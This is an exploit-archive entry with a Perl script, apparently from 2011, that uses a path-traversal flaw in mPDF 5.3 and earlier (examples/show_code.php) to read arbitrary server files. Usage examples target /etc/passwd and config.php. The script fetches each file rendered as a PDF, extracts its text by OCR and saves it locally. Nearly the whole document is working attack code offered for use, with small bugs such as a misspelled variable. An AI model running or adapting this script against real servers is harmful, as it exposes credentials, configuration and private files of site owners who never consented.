# Exploit Title: mPDF <= 5.3 File Disclosure# Google Dork: Please no dork# Date: 16th December 2011# Author: ZadYree# Software Link: http://www.mpdf1.com/mpdf/download# Version: 5.3 and prior# Tested on: Multiple# CVE : N/A#!/usr/bin/perl -U=head1 TITLE
mPDF <=5.3 File Disclosure Exploit (0day)=head2 SYNOPSIS
-- examples/show_code.php --
preg_match('/example[0]{0,1}(\d+)_(.*?)\.php/',$filename,$m);<--- URI unproperly filtered.
$num = intval($m[1]);
$title = ucfirst(preg_replace('/_/',' ',$m[2]));if(!$num || !$title){ die("Invalid file");}=head2 DESCRIPTION
This vulnerability, due to a weak filter, lets you download any unprotected remote
content, under PDF format.
The exploit may not work, depending on the set up htaccess/chmod rules on the
remote server.=head2 USAGE
perl exploit.pl -r http://p00niez.com/mpdf53/../config.php
perl exploit.pl -a http://p00niez.com/mpdf53//etc/passwd
Requiered modules:
PDF::OCR2
LWP::Simple
File::Type
Download a module:
sudo cpan -fi install Module::Name
=head3 Author
Zadyree ~ 3LRVS Team | Blog: z4d.tuxfamily.org/blog
=head3 Thanks
PHDays CTF - Yes, CTFs sometime do give you 0dayz
3LRVS Team - Support
=cut
#************* Configuration **************#
my $pdf_file ='/tmp/b00m.pdf';
$PDF::OCR2::CHECK_PDF =0;
$del_temp_file =1;#******************************************#
use 5.010;
use PDF::OCR2;
use Getopt::Std;
use LWP::Simple;
use File::Type;
use constant TRUE =>1;
use constant FALSE =>0;help() unless (@ARGV >=2);
my (%optz, $uri);
getopts('rah', \%optz);
my $relative = $optz{'r'};
my $absolute = $optz{'a'};
my $help= $optz{'h'};help() unless ($absolute || $relatife);
my ($purl, $fpath)= @ARGV;
my $name = $purl;
$name =~ s{http://(.+?)/.*}{$1};
$name .=("_". localtime(time).".txt");
$uri ='/examples/show_code.php?filename=example03_LRVS.php/../../../../../../../../'if($absolute);
$uri ='/examples/show_code.php?filename=example03_LRVS.php/../../'if($relative);help() unless ($uri);
my $furl = $purl . $uri . $fpath;
$furl =~ s#(//)#$i++?"/":$1#eg; # Yeah that's twisted.
say "[*]Retrieving content...";
my $file= make_file(get($furl));
die "[-]The stream you requested is not well formatted (forbidden page, etc).\012" unless is_pdf($file);
say "[+]OK\012[*]Converting format...";
$pdf = PDF::OCR2->new($file);
my $text = $pdf->text;
$text =~ s/[^\x0A-\x7F]+?//gm;open(my $fh,'>', $name);print $fh $text;
close($fh);
say "[+]OK\012[+]Content successfully extracted!\nFile: ", $name;
unlink($pdf_file)if($del_temp_file == TRUE);
sub make_file {
my $content = shift;open($fh,'>', $pdf_file);print $fh $content;
close($fh);return($pdf_file);}
sub is_pdf {
my $checked_file = shift;
my $ft = File::Type->new();return(1)if($ft->mime_type($checked_file) eq "application/pdf");return(0);}help()if($help);
sub help{
say <<"EOF";
Usage: perl $0[-r|-a] http://[mPDF URL]<file_to_read>
Details:-r : Relative path (ex:../file.php)-a : Absolute path (ex:/etc/file.zd)
For any more information, feel free to contact ZadYree
Happy hacking!
EOF
exit(0);}